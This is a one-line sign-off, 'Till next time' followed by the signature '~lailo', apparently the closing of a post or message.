Till next time ~lailo